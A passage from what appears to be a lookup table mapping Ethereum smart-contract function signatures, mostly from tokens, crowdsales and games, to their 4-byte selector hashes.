"isBrickOwner(uint256,address,address)": "0x49fdaea6", "resetCurrentIdTo(uint256)": "0xa14c9bed", "getProviderById(uint256)": "0x33592a1f", "getProviderDetails(uint256)": "0x11e6a0fd", "upgradeProvider(address,address)": "0x1a25e513", "claimReward(bytes32)": "0xf5414023", "YEEToken()": "0x53c66d90", "updateminContribution(uint256)": "0x9506681f", "ApaAjaToken()": "0xaab99609", "catches(address)": "0x3ff26c01", "century(address)": "0xd606f34b", "halfCentury(address)": "0xc2ea2f9c", "CricketToken()": "0x67fdc2fe", "MegaToken()": "0xa3d53934", "SILENT_Token()": "0x4ff0b071", "mintToken(address)": "0x01173a74", "BlockOfLifeToken()": "0xba8b7152", "BlockOfLifeToken(uint256,string,string)": "0xe9e7e908", "getValue2()": "0xc515205d", "setValue2(uint256)": "0x74d393f0", "getValue1()": "0x60d586f8", "setValue1(uint256)": "0x6ca0f321", "addAccess(address)": "0xa118f249", "renderWeb()": "0xff508d76", "renderLandingHash()": "0x3697d0a7", "setLandingPage(string)": "0xfff93ec3", "setHTML(string)": "0x0f66791c", "helloWorldWeb()": "0x244cee6d", "grab(address[],uint256[])": "0xfb3650c2", "collect(address,address,uint256)": "0xc8fea2fb", "sendFrom(address,address,address,uint256,uint256)": "0x18520de3", "createMasker()": "0x6769eb46", "newWallet()": "0x4a8671f1", "maskerOf(address)": "0x563183fc", "proxySetup()": "0xef4b31d8", "setMain(address)": "0x801161b0", "transferTo(address,address,uint256,uint256)": "0x8ffe9b94", "UlleToken()": "0x2d710551", "getplayersurplus()": "0x5cbc65b2", "createVoter(string)": "0xb9ce795f", "buyGameCoin(uint256)": "0x8550cf46", "getTotalVoter(address,address)": "0x3eac48a0", "giveToVoter(uint256,uint256)": "0x5d307c6f", "_createVoter(string)": "0x5992f2a1", "_shutDown()": "0x91ec1623", "_getplayersurplus()": "0xfba2b18b", "_getEarnings(address,address,uint256)": "0x907316a9", "_createPlayer(address,address)": "0x4b58484d", "finalizeTokenSaleManager()": "0xde7b1a77", "mintTimeLocked(address,uint256,uint256)": "0xb762e6e8", "addTokenSale(uint256,uint256,uint256,uint256,bool,uint256,uint256,uint256)": "0x109d42d3", "withdraw(address,address,uint256,uint256)": "0x7bfe950c", "startProject()": "0xc7656f6e", "claim(address,string,string)": "0x831f750e", "deposit(string,string)": "0x7a9b486d", "self_destruct()": "0x5ce3dec1", "ViewBet2(address,uint256)": "0xa213972c", "ViewtBet(address)": "0x3d424dc0", "ViewMyBet()": "0x0f40593e", "Dadyys()": "0x62f44d8a", "makeTrade(address,address,uint256)": "0x9c7eaac5", "setGameTax(uint8)": "0x5d123014", "setGovTax(uint8)": "0x9ee5555f", "DD()": "0xeccc32f2", "getHelloWorld()": "0xa7ef4329", "_setCurrentPassportLogic(string)": "0x30b3a90c", "_addPassportLogic(string,address)": "0x763cbde0", "setCurrentPassportLogic(string)": "0x593efdf1", "addPassportLogic(string,address)": "0xc7c40fbb", "COBAIN()": "0x8006f807", "sawcoin()": "0x5fc378df", "porcodr(uint256)": "0x2914fb3e", "LETOCoins()": "0xc55e4645", "PFS()": "0x09ff453a", "POWToken()": "0x492b8d45", "webdToken()": "0x33f35c40", "balanceOfSC()": "0x25605c6a", "ProdAToken()": "0x67e4d41d", "MyTestCoin()": "0xe8cf86ff", "ratePlanOfVendor(uint256,uint256)": "0x41348053", "ratePlansOfVendor(uint256,uint256,uint256)": "0x4ace9ccc", "modifyRatePlan(uint256,string,bytes32)": "0x33c6cdd3", "removeRatePlan(uint256)": "0xe8672de9", "createRatePlan(string,bytes32)": "0x17a5f8cc", "updateVendorName(uint256,string)": "0x01de7a1c", "updateVendorValid(uint256,bool)": "0xbff49180", "removeVendor(uint256)": "0x632261c3", "pushVendor(string,address,bool)": "0xe65d9717", "updateRefundApplications(address,uint256,bool)": "0x602b7001", "generateRoomNightToken(uint256,uint256,uint256,uint256,uint256,bytes32)": "0xc6f70370", "removeToken(uint256)": "0x36c5d724", "pushToken(address,bool)": "0xf0bd9ab5", "ClaimingTimeLimit()": "0xb1c90f6f", "bonusTokensDistributed()": "0x8d361f6e", "lastBlock_v17()": "0x07b657ce", "subsidyHalvingInterval()": "0xd58d1566", "getSelectedName()": "0x30473c2f", "bonusTokenRateLevelFour()": "0x84e9ec37", "ticketsSold()": "0x8f15024f", "cryptogs()": "0x105d3e0f", "isMarket()": "0xc8aeff39", "INITIAL_TOKEN_SUPPLY()": "0xf975f3a2", "foundersTokenTimelock()": "0x454a2958", "typeId()": "0x8f940f63", "feesA()": "0x147180ab", "detachmentTime()": "0x1b825e89", "traders()": "0xddbdf242", "oraclizeSource()": "0xb83d3f2c", "betMinAmount()": "0x12317402", "closedAt()": "0x9ef27b00", "allocated1Year()": "0x86a3e0a7", "donationAmount()": "0x4bed6c23", "autoMatch()": "0xb90d86b9", "pre()": "0x59ea287d", "FOUNDING_TEAM()": "0xf00989a8", "saleCount()": "0xa1e89aec", "availableRefunds()": "0x84f3597b", "icoBonus5()": "0x6c1f27fe", "guardian3Vote()": "0x7d9d972d", "CreationTime()": "0x90c6b18a", "getSpecifiedDecimal()": "0x663e0f88", "MjolnirAddress()": "0x7f7624d0", "softEndDate()": "0xc04605b8", "hotWalletAddress()": "0xf6b55a93", "tokensSoldExternal()": "0xa26b8822", "START_RATE()": "0xe8a6d7dc", "retrieveToken()": "0x1b347aae", "minValue()": "0x963e63c7", "tranchesSent()": "0x945d7b7e", "RoundDSold()": "0x825f5a93", "m_tokenDistributor()": "0xcc8baf63", "ownerFreezeTokens()": "0x30acedf1", "UbiqTalk()": "0x7339affc", "MAX_GAS_PRICE()": "0xe3bbb4f1", "TotalAirdropRequests()": "0x74a32dd7", "adexTeamAddress()": "0x7d264bad", "processFundingSuccessfulFinished()": "0x85e61b4a", "pausedToPublic()": "0xee91b8a7", "crowdsalePurchasesLoaded()": "0x6e96bbeb", "totalRoundSeedAmount()": "0xaf28a537", "dayTokenAddress()": "0xa120fdbd", "tokenIssuedTotal()": "0x03ec1bbe", "indFuture()": "0x23987690", "debugVal4()": "0x0d5dfdd8", "TIER1_PRICE()": "0x14cf19fe", "creatorAddress()": "0xe927fc5c", "lastBlock_f13()": "0xe0ffa0da", "sumHardCapICOStage1()": "0x5cbad0b5", "standardReleaseAmount()": "0x7e7712f2", "isCrowdSaleFinished()": "0xa07f8f19", "closeStageTwo()": "0x0b0e13d6", "mintOwner()": "0xcecb06d0", "pStopBlock()": "0x5fd9e124", "lockTs()": "0x9b35b35a", "ELIX_ADDRESS()": "0xfd5c40ea", "isRedenominated()": "0x5aab25b6", "teamOneVolume()": "0x85cdafa6", "team4LockEndTime()": "0x53b5b427", "extractableFraction()": "0xa4d924b6", "participationEndTimestamp()": "0xf5ab4c62", "tier2End()": "0x62463079", "totalCharitySent()": "0xffa230b0", "thirdPay()": "0x7dcbd078", "claimTime()": "0x27b3bf11", "getSettingValues()": "0xfefd336c", "bonussale_TokesSold()": "0x6be86f21", "assigned_bids()": "0xff6395a4", "OWNER_TAKE_SHARE()": "0x2ef2b51d", "maxTeamSize()": "0xdd7dde04", "m_exchangeRate()": "0x3556afd8", "payto1()": "0x9b60a443", "pvt_inv_Pool()": "0x0f47435b", "moveToNextCeiling()": "0x406c6633", "MARKET()": "0xf46f16c2", "publicAllocation()": "0x4ae0f543", "PreSaleDeadline()": "0x3332baa3", "strike()": "0xad8f5008", "tokenExchangeAddress()": "0xef80ff18", "ROUND_DATA_COUNT()": "0x72601faa", "YRX()": "0x9901bc77", "developmentLockEndTime()": "0x870f0e27", "MAX_PRE_SALE_AMOUNT()": "0x4e2e94f7", "allocated6Months()": "0xc65daea0", "auctionFinalized()": "0x0bd8a1d0", "OXGOLDSupply()": "0xecaa0e45", "crowdsaleDasTokensChangeBeneficiary()": "0x116e8726", "DeathFactor_v()": "0x1c363e14", "SOFT_CAP_IN_ETHER()": "0x4529cd71", "regFactory()": "0x656362b5", "periodCrowdsale()": "0x6b523b68", "interCrypto()": "0x855085b8", "stageAdmin()": "0x69efe2bf", "icoPhaseAmount3()": "0x3bb197cf", "deathData_f0()": "0x88c12be2", "getThresholdsLength()": "0x9e1d14f1", "tokenReceived()": "0xeae19df4", "migrationCompleted()": "0x31677980", "stage4_start()": "0x3c37a88b", "tokenBurned()": "0xa1ad7cef", "minVoteWeightK()": "0x56624ce6", "tokensForEcosystem()": "0x4c4cfc3b", "bountiesMinted()": "0x3984ae12", "finishRoundB()": "0x14449c92", "swarmFundAddress()": "0x69b041bb", "bank2Val()": "0xea149ab5", "currentAirdropAmount()": "0x7424bab1", "_leftSupply()": "0x16aa8508", "totalAmountOfEarlyPurchasesInCny()": "0xb5debd95", "presaleDateFinish()": "0xa9ae8323", "discountPeriod()": "0xb37bcd94", "icoPhase4Start()": "0x7528a6ab", "updaterAddress()": "0xfdbc6530", "DEVCLASS_FTL_SPEED()": "0x2d94d41e", "tradeEventEnabled()": "0xd5893bb2", "timeToBorn()": "0x4256fa5a", "saleHardcap()": "0x25d3bcd1", "presaleFemaleDiscount()": "0x6d2ab982", "CurrentRevision()": "0x8874fa28", "payoutIdx()": "0xa60f3588", "sumPublicSale()": "0x409f33c1", "mainSaleSecondStartDate()": "0x503a3609", "ETH_PER_LARE()": "0x8a7a7e03", "cancelSwap()": "0x9e0fdb26", "validateLock()": "0x78420d4a", "CoinVillaTalk()": "0x3a80bd25", "foundersAllocatedAmount()": "0x96b86436", "preIcoRate()": "0xd1e58e0f", "remainderHolder()": "0x615df83a", "writerAccountSupply()": "0xb5f9371a", "mMaxAppCode()": "0x41fb55c6", "pID_()": "0x4b227176", "walletBounties()": "0x9e3d49db", "ICO_PHASE1_BONUS_PERCENTAGE()": "0x08fae7db", "carousalRatio()": "0xee94d7ba", "startBlockNumber_()": "0xa0dbd8d6", "privateOfferingWallet()": "0x25b2ac77", "dailySupply()": "0xe8b611d6", "MINBET_forORACLIZE()": "0xad64fa5c", "ethereumPrice()": "0x51aa0199", "PRE_SALE_START_1()": "0xc5feaf60", "maxGuaranteedLimit()": "0x4d1ed74b", "teamShare()": "0xea6ef2fe", "allocateTokensForAdvisor()": "0xbe5f3d12", "EARLY_FOUNDERS_CAP()": "0x70dc86cd", "MIN_WEI_AMOUNT()": "0xe95f206e", "whiteListLimit()": "0xd244059a", "lottoLength()": "0xef34ded2", "CHECKPOINT_KEY()": "0xbcddd64e", "reservedTokensAreDistributed()": "0xf9cb6d7a", "getCurrentPot()": "0xe7eed1f7", "BountyAmount()": "0x16a0390b", "round4StartTime()": "0xe4b34274", "JP_winningHash()": "0xb08c2915", "GENSIS_TOTAL_COUNT()": "0xd0774f74", "RELEASE_TIME()": "0x3dc1579a", "ICOReserveLockUp()": "0xbe317e7e", "optionProgram()": "0xac8261c9", "minedTokenCap()": "0x0a1f5862", "EXCHANGE()": "0xb50e44b8", "playFast()": "0xd172d6fc", "numFactories()": "0x29daaa5e", "TOKENS_address()": "0x29c1ee0d", "votingController()": "0x517afbcf", "gameCloneFee()": "0xc1232366", "sendReserveTokens()": "0x68750bbc", "endTimeRound2()": "0x4b9de81e", "unfreezeFoundingTeamBalance()": "0x2853f925", "totalDeployments()": "0xfb35b4e4", "tokensToBeAllocated()": "0x990ca3ff", "transferEnablingDate()": "0x697025b6", "hatchMaxTime()": "0x217b97e4", "TMEXAddress()": "0x7363d85b", "DEVELOPER_RESERVED()": "0xca621ac3", "tokensToMintInHold()": "0xe520f09e", "lastAddYear()": "0x2f334131", "totalToDistribute()": "0x211a04db", "firstPreSaleDate1()": "0x6a172536", "discountTokenAmount()": "0x9a065a60", "feesAvailableForWithdraw()": "0xde5785d5", "okamiMaxPurchase_()": "0x12f6e641", "jackpotPaused()": "0x20709b35", "marketAddress()": "0x95623641", "WLMTfinney()": "0x5b52b9db", "countingMeme()": "0x89f9b01e", "m_aOwner()": "0x73d4c0ff", "TRONVSupply()": "0x6293a989", "bountyBeneficiariesCount()": "0x48709183", "getCurrentWinnerMoveCount()": "0x726ef3da", "ownerAlias()": "0xc9bebd90", "gracePeriodMinTran()": "0xcf2f856e", "WALLET_LB_RESERVED()": "0x9c71fda4", "startICOStage1()": "0x889258ea", "addPokemon(string,address,uint256)": "0xe14a147e", "setPokemon(uint256,string,address,uint256,uint256)": "0x8fd79669", "deletePokemon(uint256)": "0xb1e9b21d", "getPokemonLevel(uint256)": "0xb23b369b", "getPokemonOwner(uint256)": "0x9ea30fae", "getPokemonCurrentPrice(uint256)": "0x7586cd45", "getPokemonDetails(uint256)": "0xd79521e8", "purchasePokemon(uint256)": "0xc15f618a", "getPokemonLock(uint256)": "0x9933c6b5", "removeLock(uint256)": "0x10d0059c", "addLock(uint256)": "0x7fa3f3d0", "GetGamestatus()": "0x06b2e607", "unPauseGame()": "0xf42b1ae0", "pauseGame()": "0x499831f2", "settournamentPrizeAddress(address)": "0xef982eba", "setdevFeeAddress(address)": "0x9ad1c999", "CryptoPokemon()": "0x7e55ec25", "getWalletResourceBalance(address)": "0xd04b019e", "getResourceBalance(uint16,address)": "0xa0c6e65e", "getResourceCount()": "0x9f96de0f", "getResourceName(uint16)": "0xd9964d92", "burnResource(uint16,uint256)": "0xb8c9c4d2", "mintResource(uint16,uint256)": "0x23539cd4", "transferFactoryResourceAmount(uint16,address,uint256)": "0xe2877e04", "withdrawFactoryResourceBalance(uint16)": "0x5f184eda", "setResourcesOtherManager(address,uint8)": "0x85c95d30", "setResourcesBanker(address)": "0x7af915af", "setResourcesSecondaryManager(address)": "0x92008bfa", "setResourcesPrimaryManager(address)": "0x7cc2fe49", "createNewCSCResource(string,string,uint256)": "0x607dc1d6", "CSCResourceFactory()": "0xe5c5dabb", "CSCResource(string,string,uint256)": "0x80270b33", "ProofOfNoSnipers()": "0x49484450", "refund(bytes20,address)": "0xf66c75e5", "redeem(bytes32)": "0xeda1122c", "initiate(uint256,bytes20,address,address,bool,uint256)": "0x7337c993", "MHCToken()": "0xad41b628", "MHCTokenIssue(address)": "0x6e74774a", "setAllowed(address)": "0xc0e79a11", "getActionPrice(string)": "0xc6c8823c", "setAction(string,uint256)": "0xf7a34573", "transferIXT(address,address,string)": "0x2c04bf0c", "IXTPaymentContract(address)": "0x2bc24d52", "confirmUpgrade()": "0x9cb6fc77", "Upgradeable()": "0x672566a0", "emergencyEthDrain(uint256)": "0x2c7cc1f0", "EmergencySafe()": "0xe79e770f", "getRateIncludingBonus()": "0x91f9f4a2", "SealPrivateCrowdsale()": "0x405871e5", "closeVoring()": "0xf7f74b56", "registerForVoting()": "0x29d07c23", "startVotingPrepare(address)": "0xd34be5be", "registerVotingPrepareFailure()": "0x58b9dcef", "sendToBeneficiaryContract()": "0xcf934fb8", "destroyUselessContract()": "0x7b8208b7", "fastBuyBonus()": "0x5cdfe733", "donateAuthor()": "0x1d4d8656", "receive()": "0xa3e76c0f", "ERC827Receiver()": "0xb65177ee", "Dancoin()": "0x23a1bd8f", "renounceContract()": "0xfa2f7a8f", "existsContract(address)": "0x25c54456", "doneOptions()": "0x2e37fa97", "refundOptions(address)": "0x0e542f82", "storeOptions(address,uint256)": "0x36610cb9", "ChainclubToken()": "0x3b599b18", "TaskCoin()": "0xcc9b71c2", "MannaCoin(address,address)": "0x7b0b5b93", "etherTransfer(uint256,address[])": "0xeb712a48", "allFinalised()": "0xf450d53a", "finaliseAs(address)": "0x804b55d5", "maxTokenPurchase(address)": "0x1af217ab", "getTokens(address,uint256)": "0x2c512d6e", "investAs(address)": "0xf3f9240b", "finaliseFirstPhase()": "0xdeb52738", "auctionBonus(uint256)": "0x4acd058e", "theDeal(uint256)": "0xb3c7d097", "maxPurchase()": "0x977b055b", "calculateEndTime()": "0x44af946f", "_buyin(address,uint256)": "0x8c272dba", "buyinAs(address)": "0xbc52b43b", "buyin()": "0x69766079", "SmartCityCrowdsale(address,address,address,uint256,uint256,uint256)": "0x3db7c149", "setTokenStart(uint256)": "0x2d28bb02", "clientWithdraw(uint256)": "0x3a3cd062", "clientWithdrawAll()": "0x14e8093f", "refundAll()": "0x38e771ab", "fire()": "0x457094cc", "withdrawAfterEnd()": "0x4a3a835c", "stopWorkInternal()": "0x6a893a8c", "checkForNewDay()": "0x3428e7ba", "startWork(string)": "0x73b51d38", "hire(address,uint256)": "0xf23ba8e6", "releaseOwnership()": "0xd85633ec", "canStopWork()": "0x9057bc48", "canStartWork()": "0xf0fdb32f", "isNewDay()": "0xb545252c", "hasEnoughFundsToStart()": "0xcc3e378e", "isOvertime()": "0x54790b7d", "getWorkSecondsInProgress()": "0xbbfbaaf8", "MIN_HARD_CAP()": "0x76ddfc39", "totalETHraised()": "0x7d4504e0", "front()": "0xba75bbd8", "AdvisorsAddress()": "0x72432965", "DECIMALCOUNT()": "0xe3ec5046", "BonusesDistributed()": "0x4a4753bc", "kairosOwner()": "0x7c94830b", "exchangeRateETHToUSD()": "0x87b5914c", "sumHardCapPreICO2()": "0xbd4ed6cc", "box2Star5()": "0x964b97de", "fee_ratio()": "0x81b69494", "stoppedPresale()": "0x150f16ac", "tier_cap_1()": "0x9226084e", "minPublicContribAmount()": "0x20dc4677", "abc()": "0x92277933", "ads()": "0xb6eda884", "BOUNTIES_SHARE()": "0x7e6d86ff", "maxIssuedTokensPerIco()": "0x03b05c73", "minimum_goal()": "0x184b1912", "feeFunds()": "0x6fd63728", "idle()": "0x3192164f", "castleContract()": "0xeb83f015", "icoEndOfStageB()": "0xf309caca", "VALUE()": "0x509d8c72", "availableBalance()": "0xab2f0e51", "cnd()": "0x334f0611", "tgrSettingsPartContributorIncreasePerStage()": "0x853262a2", "ETHFINEX_FEE()": "0x3f01dc99", "initialClaesOffering()": "0x6117525b", "endPreICOStage()": "0xf3c8ffaa", "amountSold()": "0x52a16bb0", "USD_IN_ETH()": "0x8ce69b72", "ethPerTransactionLimit()": "0x01996951", "dayAfterDeadline()": "0x11b8f957", "investorsFee()": "0xe876e3f1", "supplyTokens()": "0x92925c3b", "is_transfer_allowed()": "0x5d54cb1f", "sanity_check()": "0x102455a5", "soldTokensPreIco()": "0x9d45b9d2", "ethforp3dbuy()": "0x9995bbf7", "LIQUIDATION_TOKENS_PER_ETH()": "0xce23e8bc", "rateBase()": "0x014e95ba", "totalSupplyMarket()": "0xdbd229ff", "END_AMOUNT()": "0x7548f65b", "currentTokenPerETH()": "0x699c181e", "gemSpeedConversion()": "0x5f96d9fa", "votosTotales()": "0x1464f516", "fstUnitPriceNumerator()": "0x28f28529", "standFeeBefore500()": "0x5762a880", "IcoStartDate()": "0x402b2bca", "reached()": "0x2ec40ac8", "endEarlyBird()": "0x2dcbfdfa", "wireLimit()": "0x2b65d18a", "preSaleState()": "0xe9324444", "prePreSalePeriod()": "0xe5664f65", "runSweepStake()": "0xe0f32198", "pendingVestingPool()": "0x86dc8ace", "feeInfo()": "0x995b5aae", "SUPER_ADMIN()": "0x7c7c7c3c", "getCostToken()": "0xe1f4895a", "dividendDistribution()": "0x9647259c", "preIcoEnd()": "0x833270d8", "stopSetPrice()": "0x0a0a876f", "endFullBonusTime()": "0xf0d6cc70", "endICOStage3()": "0x386892d8", "DST_R_N_B_PROGRAM()": "0x9d9b4d20", "totalIncome()": "0x522577e9", "escrowCount()": "0x675ac67a", "maxGoalReachedAt()": "0xc4f1215c", "serviceFee()": "0x8abdf5aa", "icoBonus4EndDate()": "0x6fc8e920", "crowdsaleStopped()": "0xc302a45b", "checkDisabledStatus()": "0xe84d90c0", "BONUS_ICO_STAGE1_PRE_SALE2()": "0x2286b7de", "absoluteMinTimeLock()": "0xea8a66c7", "mintingOracle()": "0xb36ada82", "hashesSize()": "0x37c43088", "icoStandardPrice()": "0x6175adee", "minChequeValue()": "0x879e84ab", "marketWallet()": "0xe4440a86", "someValue()": "0x4a627e61", "ICO_PRICE6()": "0x912875bc", "ADDR_TKG_ASSOCIATION()": "0x243feeb0", "withdrawLimit()": "0xf848d541", "FUTURE_ME_TOKENS()": "0xf2e253ec", "amountTokensPerEth()": "0xde6ef007", "stat()": "0x0435a745", "sendPer3()": "0xedf049f7", "soldTokensOnPreIco()": "0x0a0209d0", "PERCENT_100()": "0x7e780157", "getTotalSellingMonsters()": "0x85ff96a7", "MAXIMAL_PARTICIPATION()": "0x0346a4ad", "communityTokens2()": "0xa1cbae6c", "hardcapInTokens()": "0xb01f31c9", "BONUS_TIER_7_LIMIT()": "0x116a6f6c", "createDigitalArtFee()": "0x26a65c10", "oraclizeOn()": "0xb9cc8b48", "feesTaken()": "0xf7b53431", "initializeAssetsToThisApplication()": "0x22b01343", "rate_toCap()": "0xcd09263f", "initialRewardFraction()": "0xe787887b", "pingTimestamp()": "0x81ed8680", "auctionLength()": "0x325c25a2", "ico2total()": "0xf0e5eeac", "Holder()": "0x3c19fc06", "maxPrice()": "0xe38d6b5c", "maxP1Cap()": "0x4aa5a05d", "window2TotalSupply()": "0xc8ef8b00", "etherToLEONRate()": "0x18db02e1", "ecosystemAddress()": "0x06a5cb3a", "CUSTOM_ERC20_MINT_SERVICE_NAME()": "0x6d6fb665", "VOLUME_25()": "0xbb1a473b", "Group_3()": "0x85e5908e", "STARTING_SWORD()": "0xcd7d5b92", "ownerLockedBalance()": "0x768e7220", "getTotalWEIEther()": "0xec9974eb", "OWNER_TOKENS_PERCENT()": "0x6b63d145", "mined_coin_supply()": "0x5d6c3ea7", "theDao()": "0x626d666c", "longDescription()": "0xba25d944", "purchaseTokenPointer()": "0x5cbb2ac3", "TOKENS_SUPPLY()": "0xec0a0b50", "stateOfICO()": "0x2e9453c2", "soldPercent()": "0xbacd8d88", "funderCount()": "0x0b3bc259", "tokenTest()": "0xeec13165", "max_bet_this_spin()": "0x9dd0ff01", "lastWinningNumber()": "0x7ff931bd", "runeToWeiRatio()": "0xbd968eed", "num_holders()": "0x02433d0f", "COIN_SUPPLY_ICO_TIER_3()": "0x78efa1db", "MAX_BATCH_SIZE()": "0xcfdbf254", "BONUS_ICO_WEEK_TWO()": "0x024c6def", "getLastRoundInfo()": "0x705e798e", "totalCentsCollected()": "0x84fa2c97", "ethFoundDeposit()": "0x7bb26a1b", "addressFundHolder()": "0x555af8f4", "IsEnable()": "0x5c26a007", "totalEarn()": "0xdffd722f", "rateFeesDenominator()": "0x75c268f3", "leader_2()": "0xf478cef1", "addresIndex()": "0xac403817", "tokenSelled()": "0x687cde1a", "Decimals()": "0xc6ceb50b", "MIN_ETH_TRANS()": "0x9add2ad9", "UP_etherWin()": "0x57820829", "indiFundAndSocialVaultDeposit()": "0x1a476260", "GENEOS()": "0x9ed78285", "getVestingWalletLength()": "0xc9fd1955", "tokenETHAmount()": "0xed824f2f", "MELON_ASSET()": "0x9878cc51", "mInviteAddr()": "0x2c1ff9f8", "lastRewardEthBlockNumber()": "0x163aa00d", "mainFundBalance()": "0x7179d079", "pvt_plmt_max_in_Wei()": "0xcf0023ec", "WEI_PER_ETHER()": "0x19a1b54f", "TOKEN_SALE_SUPPLY()": "0x5d0cb15d", "RESERVED_TOKENS_TIQPIT_SOLUTIONS()": "0x075bbcc7", "BASE_URL()": "0x7f78636a", "aquaman()": "0x8833ae6f", "ETH_FUND_DEPOSIT()": "0xfd74a151", "PRICE_STANDARD()": "0xefe79268", "LOCKAMOUNT()": "0xafd20e33", "collected_crowd_wei()": "0x5c10cab8", "firstStageCap()": "0xd232a8f5", "p3()": "0x6e219667", "numberOfPingsReceived()": "0x6c5f71c7", "erc20Token()": "0x8a13eea7", "manager_address()": "0x1800ed8e", "saleBalance()": "0xfab14b36", "teamJust()": "0x0f3bd3fd", "finalBlock()": "0x26b51c8c", "isAetherClockAuction()": "0x1aa58bd3", "AssetCollectionNum()": "0x4073002e", "disableTokenSale()": "0x55f1a3c8", "depositCommission()": "0x904cbd79", "vestingBonusMultiplierPrecision()": "0x20ad3874", "Start_Resume_ICO()": "0x33d64a6f", "mPausedTime()": "0x8fabd326", "creationAddress()": "0x47af954d", "previousRoundJackpot()": "0x86e5ceb4", "exchangeRegulatorWallet()": "0x7ad0bf86", "dividendAddress()": "0x546d08fe", "mintB()": "0x8043cf2d", "TOKEN_WITHDRAWAL_START_DATE()": "0x079c002f", "PRECOMMITMENT_VESTING_SECONDS()": "0x65d5b48d", "window0TotalSupply()": "0x024187a5", "roundEth()": "0x32519e0e", "contributionTime()": "0x9bf39dce", "getTransfers()": "0x2f65142c", "initDate()": "0xffa68839", "levelTokens()": "0x7f9f5495", "lpAskPrice()": "0x880c0b9d", "ownershipDistributed()": "0xcc826160", "fundWallet2()": "0x3e1cc152", "contract_date()": "0xe020b8a3", "PublicMiningReward()": "0x70ee9edd", "econReserveTimeLock()": "0x388b5786", "kycVerifiedBonusBps()": "0x5b25c137", "COMMON_BUDGET_AMOUNT()": "0x2fc516e3", "setup(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256[],uint256[],uint256[],uint256[],uint256[])": "0x7ebdab54", "finalize2()": "0x02093ee2", "getTokenSaleType()": "0xcaa035d6", "firstMintRound0(uint256)": "0xb0e657a7", "begin()": "0x1bce6ff3", "onlyAdmin(bool)": "0xda83a649", "vestedBalanceOf(address)": "0x0e2d1a2a", "CDTToken(uint256)": "0x5db17dab", "buyTokens(uint256)": "0x3610724e", "kkICOTest77()": "0x4ed0694f", "PCHAlN()": "0x9753a84e", "InsightChainToken()": "0xd922cd12", "CyberChainToken()": "0x9b8f5acf", "setDiscountedInvestor(address,bool)": "0x7289f9aa", "setEndingBlock(uint256)": "0x46755c68", "setStartingBlock(uint256)": "0xec17b20e", "CrowdsaleToken(string,string,uint256,uint8,address,bool)": "0x4735c747", "changeUpgradeMaster(address)": "0xea56a44d", "MintableToken(uint256,address,bool)": "0x5cdd95e3", "setFundingCap(uint256)": "0x2a013925", "setOwnerTestValue(uint8)": "0xbb23ef74", "setEarlyParticipantWhitelist(address,bool)": "0x58bad3eb", "updateInvestorFunds(uint256,uint256,address,uint128)": "0x21141c38", "calculatePrice(uint256,address)": "0xc2d4f851", "weiAllowedToReceive(uint256,address)": "0x9f6e4bb5", "GenericCrowdsale(address,uint256,uint256,uint256)": "0xbebdd5ca", "multiMint(uint256,uint256[])": "0x88df13fa", "stopMinting()": "0x3e3e0b12", "Ledger()": "0x4cf125de", "decreaseApproval(address,address,uint256)": "0xf019c267", "increaseApproval(address,address,uint256)": "0xbcdd6121", "ledgerTransfer(address,address,uint256)": "0xf5c86d2a", "setLedger(address)": "0x3246887d", "controllerApprove(address,address,uint256)": "0x8e339b66", "setMotd(string)": "0x5fe59b9d", "FobsCoin()": "0x4ae0ac60", "ZeroChainToken()": "0x868203ea", "LanderToken(uint256,string,uint8,string)": "0x8c907c0d", "airDrop(address[])": "0x00b6849f", "transferPrivateSale(address,uint256)": "0x544d6544", "setTokenSaleContract(address)": "0x354d89ee", "setTimeSale(uint256,uint256)": "0x107e8b24", "BigbomToken(uint256,uint256,address,address,address,address,address,address,address)": "0xbe571e2e", "freezeAccount(address,bool,uint256)": "0x4a382c36", "selfFreeze(bool,uint256)": "0x88d0820e", "checkMaxAllowed(address)": "0xaf5c295a", "listAddresses(address[],uint256[])": "0xaf7b2eb7", "listAddress(address,uint256)": "0x47d3def9", "BigbomPrivateSaleList()": "0xe8a0e3c9", "provide_eth()": "0x8f49a264", "partial_refund_my_ether()": "0x5a8830e2", "refund_my_ether()": "0x3c4293d8", "withdraw_tokens_for(address)": "0x5219ffb8", "withdraw_my_tokens()": "0x157f67e8", "tokens_received()": "0x74942c0f", "calculate_with_fees(uint256)": "0x65fa2b97", "take_fees_eth_owner()": "0x5f07bd15", "take_fees_eth_dev()": "0xd9abedb4", "partial_refund(address)": "0xa6c1f87f", "emergency_eth_withdraw()": "0x7a87f51a", "emergency_token_withdraw(address,address)": "0xb16ab3a3", "change_fee(uint256)": "0x6ceba55e", "change_min_amount(uint256)": "0x2fbfe951", "change_max_amount(uint256)": "0x398f2648", "change_individual_cap(uint256)": "0x29d98a7b", "set_whitelist_enabled(bool)": "0x10d2f2e5", "set_percent_reduction(uint256)": "0x678f7033", "set_tokens_received()": "0x48103077", "set_allow_contributions(bool)": "0x666375e5", "set_token_address(address)": "0x42263aa2", "set_gas_price_max(uint256)": "0xe70e690a", "whitelist_addys(address[],bool)": "0x83b47a4d", "buy_the_tokens(bytes)": "0x86117319", "change_owner(address)": "0x253c8bd4", "checkCutoffsBatch(address[],bytes20[],uint256[])": "0x00a16cab", "setTradingPairCutoffs(bytes20,uint256)": "0x4b99f0c5", "setCutoffs(uint256)": "0xfd902d1e", "batchAddCancelledOrFilled(bytes32[])": "0x73964787", "addCancelledOrFilled(bytes32,uint256)": "0x26fed988", "addCancelled(bytes32,uint256)": "0xc955b514", "batchTransferToken(address,address,address,uint8,bytes32[])": "0x4390a4f8", "ERC223Token()": "0x28cf8b6f", "getCurrentLeaderOwners()": "0x25c7cd17", "purchaseLeader(uint256)": "0xbbb37f60", "payPreviousOwner(address,uint256)": "0x0f134bee", "CryptoLeaders()": "0x6e78e95f", "INDOPAY()": "0x263e6d0d", "setLocked(bool)": "0x211e28b6", "setBuyPrice(uint256)": "0x63ae8d6c", "transferEthers()": "0xd271011d", "icoFinished()": "0x356e2927", "internalIcoFinished(uint256)": "0x456f3c3b", "FLiK(uint256,string,string,uint256,uint256)": "0xe5438f5e", "Litecoinprivate()": "0x31671f57", "multiSendFrom(address,address[],uint256[])": "0xa7ff2373", "multiSend(address[],uint256[])": "0xbb4c9f0b", "acceptCreatureOwnership()": "0x8252b2cf", "transferCreatureOwnership(address)": "0x6e7d9dc6", "queryCreatureOwner()": "0x364d2a06", "fuelContract()": "0xb4f3625e", "ART_CONTRACT_ADDRESS()": "0x2bbd3c93", "burner()": "0x27810b6e", "refundeesListLength()": "0x455bf142", "AgriChainDescriptionInt()": "0xf66d278e", "weicap()": 